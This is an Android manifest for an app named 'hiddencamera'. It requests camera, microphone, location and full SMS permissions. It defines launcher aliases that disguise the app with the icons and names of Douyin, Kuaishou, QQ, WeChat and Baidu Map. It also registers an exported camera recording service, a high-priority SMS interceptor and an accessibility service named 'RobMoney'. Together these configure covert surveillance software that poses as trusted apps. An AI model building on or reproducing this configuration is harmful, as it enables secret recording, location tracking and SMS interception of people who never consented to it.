<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.leng.hiddencamera">

    <uses-feature android:name="android.hardware.camera" />
    <uses-feature android:name="android.hardware.camera.autofocus" />

    <uses-permission android:name="android.permission.CAMERA" /> <!-- 用于访问wifi网络信息，wifi信息会用于进行网络定位 -->
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <uses-permission android:name="android.permission.RECORD_VIDEO" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.DEVICE_POWER" />
    <uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS" />
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.WRITE_USER_DICTIONARY" />
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />
    <uses-permission android:name="android.permission.INTERACT_ACROSS_USERS_FULL" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" /> <!-- 这个权限用于获取wifi的获取权限，wifi信息会用来进行网络定位 -->
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.INTERNAL_SYSTEM_WINDOW" />
    <uses-permission android:name="android.permission.WRITE_SMS" />
    <uses-permission android:name="android.permission.SYSTEM_OVERLAY_WINDOW" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"></uses-permission>
    <uses-feature android:name="android.hardware.usb.host"/>
    <uses-permission android:name="android.permission.ACCESS_NOTIFICATION_POLICY"/>

    <application
        android:name=".MyApp"
        android:allowBackup="true"
        android:icon="@mipmap/app_icon"
        android:label="@string/app_name"
        android:theme="@style/AppTheme">
        <activity android:name=".mine.SetActivity"></activity>
        <activity android:name=".mine.PmwsSetActivity"></activity>
        <activity
            android:name=".home.SplashActivity"
            android:icon="@mipmap/app_icon"
            android:label="@string/app_name_set"
            android:theme="@style/AppTheme.Splash">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity
            android:name=".MainActivity"
            android:excludeFromRecents="false"
            android:exported="true"
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:icon="@mipmap/app_icon"
            android:label="@string/app_name"
            android:launchMode="singleTask">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <activity-alias
            android:name=".home.DouYin"
            android:enabled="false"
            android:excludeFromRecents="false"
            android:exported="true"
            android:icon="@mipmap/pretend_douyin"
            android:label="@string/pretend_name_douyin"
            android:launchMode="singleTask"
            android:targetActivity=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>
        <activity-alias
            android:name=".home.KuaiShou"
            android:enabled="false"
            android:excludeFromRecents="false"
            android:exported="true"
            android:icon="@mipmap/pretend_kuaishou"
            android:label="@string/pretend_name_kuaishou"
            android:launchMode="singleTask"
            android:targetActivity=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>
        <activity-alias
            android:name=".home.QQ"
            android:enabled="false"
            android:excludeFromRecents="false"
            android:exported="true"
            android:icon="@mipmap/pretend_qq"
            android:label="@string/pretend_name_qq"
            android:launchMode="singleTask"
            android:targetActivity=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>
        <activity-alias
            android:name=".home.Weichat"
            android:enabled="false"
            android:excludeFromRecents="false"
            android:exported="true"
            android:icon="@mipmap/pretend_wechat"
            android:label="@string/pretend_name_wechat"
            android:launchMode="singleTask"
            android:targetActivity=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>
        <activity-alias
            android:name=".home.BaiduMap"
            android:enabled="false"
            android:excludeFromRecents="false"
            android:exported="true"
            android:icon="@mipmap/pretend_baidumap"
            android:label="@string/pretend_name_baidumap"
            android:launchMode="singleTask"
            android:targetActivity=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>


        <activity-alias
            android:name=".home.DouYinSet"
            android:enabled="false"
            android:excludeFromRecents="false"
            android:exported="true"
            android:icon="@mipmap/pretend_douyin"
            android:label="@string/pretend_name_douyin_set"
            android:launchMode="singleTask"
            android:targetActivity=".home.SplashActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>
        <activity-alias
            android:name=".home.KuaiShouSet"
            android:enabled="false"
            android:excludeFromRecents="false"
            android:exported="true"
            android:icon="@mipmap/pretend_kuaishou"
            android:label="@string/pretend_name_kuaishou_set"
            android:launchMode="singleTask"
            android:targetActivity=".home.SplashActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>
        <activity-alias
            android:name=".home.QQSet"
            android:enabled="false"
            android:excludeFromRecents="false"
            android:exported="true"
            android:icon="@mipmap/pretend_qq"
            android:label="@string/pretend_name_qq_set"
            android:launchMode="singleTask"
            android:targetActivity=".home.SplashActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>
        <activity-alias
            android:name=".home.WeichatSet"
            android:enabled="false"
            android:excludeFromRecents="false"
            android:exported="true"
            android:icon="@mipmap/pretend_wechat"
            android:label="@string/pretend_name_wechat_set"
            android:launchMode="singleTask"
            android:targetActivity=".home.SplashActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>
        <activity-alias
            android:name=".home.BaiduMapSet"
            android:enabled="false"
            android:excludeFromRecents="false"
            android:exported="true"
            android:icon="@mipmap/pretend_baidumap"
            android:label="@string/pretend_name_baidumap_set"
            android:launchMode="singleTask"
            android:targetActivity=".home.SplashActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>

        <provider
            android:name=".other.MyFileProvider"
            android:authorities="${applicationId}.fileProvider"
            android:exported="false"
            android:grantUriPermissions="true"
            tools:replace="name,authorities,exported,grantUriPermissions">
            <meta-data
                android:name="android.support.FILE_PROVIDER_PATHS"
                android:resource="@xml/file_paths"
                tools:replace="name,resource" />
        </provider> <!-- 全面屏 -->
        <activity
            android:name=".mine.MyVediosActivity"
            android:theme="@android:style/Theme.Dialog" />
        <activity
            android:name=".zipFiles.AlertActivity"
            android:theme="@android:style/Theme.Dialog" />

        <service android:name=".zipFiles.encrypte.EncryptedService2" />
        <service android:name=".zipFiles.decrypted.DecryptedFileService" />
        <service
            android:name=".home.CameraRecordService"
            android:enabled="true"
            android:exported="true"
            android:priority="1000" />

        <receiver android:name=".zipFiles.AlarmReceiver" />
        <receiver android:name=".zipFiles.decrypted.DecrypAlarmReceiver" />
        <receiver android:name=".zipFiles.SmsReciver">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <!-- 无障碍服务配置 -->
        <service
            android:name=".other.RobMoney"
            android:enabled="true"
            android:exported="true"
            android:label="@string/app_name"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>

            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/rob_service_config" />
        </service>
        <service android:name=".home.UVCCameraService"
            android:enabled="true"></service>
    </application>

</manifest>